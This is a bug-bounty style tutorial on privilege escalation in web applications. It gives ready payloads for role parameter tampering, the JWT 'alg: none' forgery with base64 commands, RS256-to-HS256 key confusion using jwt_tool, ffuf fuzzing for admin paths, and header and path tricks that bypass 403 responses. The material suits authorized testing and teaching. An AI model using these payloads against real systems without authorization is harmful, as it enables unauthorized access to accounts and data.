Privilege Escalation

Vertical authorization failures - where a lower-privileged user gains access to higher-privileged functions or data. These pay well because the impact is concrete: you can demonstrate accessing admin functionality, other users' data, or modifying your own permissions.

Role Parameter Tampering

The simplest version - the role is just a parameter the client sends, and the server trusts it.

Registration / profile update:

POST /api/v1/users/register HTTP/1.1
Content-Type: application/json
 
{
  "email": "attacker@evil.com",
  "password": "password123",
  "role": "admin"
}

Try adding role, is_admin, user_type, account_type, subscription to any POST/PUT/PATCH body. What does the server accept?

Hidden form fields:

<input type="hidden" name="role" value="user">

Change user to admin before submitting. Still happens on older apps.

JWT Claim Modification

JWTs are base64-encoded and signed - but if the signature isn't validated properly, you can modify the claims.

Algorithm: none attack - change the algorithm to none and strip the signature:

# Decode header
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" | base64 -d
# {"alg":"HS256","typ":"JWT"}
 
# Modify: {"alg":"none","typ":"JWT"}
echo -n '{"alg":"none","typ":"JWT"}' | base64 | tr -d '='
# New header
 
# Modify payload: change "role":"user" to "role":"admin"
echo "eyJ1c2VyX2lkIjoxMjMsInJvbGUiOiJ1c2VyIn0=" | base64 -d
# {"user_id":123,"role":"user"}
 
echo -n '{"user_id":123,"role":"admin"}' | base64 | tr -d '='
 
# Construct: HEADER.PAYLOAD. (empty signature, trailing dot)

RS256 → HS256 confusion - if the server uses RS256 (asymmetric), the public key is... public. If you can trick the server into treating the public key as an HMAC secret:

# Sign the JWT with HS256 using the server's public key as the HMAC secret
# jwt_tool automates this
python3 jwt_tool.py TOKEN -X k -pk public_key.pem

jwt_tool is the go-to for JWT attacks. Run it with -T to tamper interactively.

Forced Browsing to Admin Endpoints

Admin interfaces are often at predictable paths. The app might not show them in the UI for non-admins, but it might not enforce the access control either.

/admin
/admin/users
/admin/dashboard
/management
/internal
/backstage
/superuser
/staff
/moderator
/_admin
/api/admin/...
/api/internal/...

Use a wordlist like SecLists/Discovery/Web-Content/big.txt combined with admin-specific ones. Feroxbuster or ffuf:

ffuf -u https://target.com/FUZZ -w /path/to/SecLists/Discovery/Web-Content/common.txt \
  -H "Cookie: session=YOUR_SESSION" \
  -mc 200,301,302,403 \
  -o admin_fuzz.json

A 403 is interesting - the endpoint exists but is blocked. Sometimes those 403s are bypassable.

403 Bypass Techniques

When you find an admin endpoint returning 403:

# Header-based bypasses
GET /admin HTTP/1.1
X-Original-URL: /admin
X-Rewrite-URL: /admin
X-Custom-IP-Authorization: 127.0.0.1
X-Forwarded-For: 127.0.0.1
 
# Path-based bypasses
GET /ADMIN
GET /admin/
GET /admin/.
GET /%2fadmin
GET /admin;/
GET /./admin
GET //admin//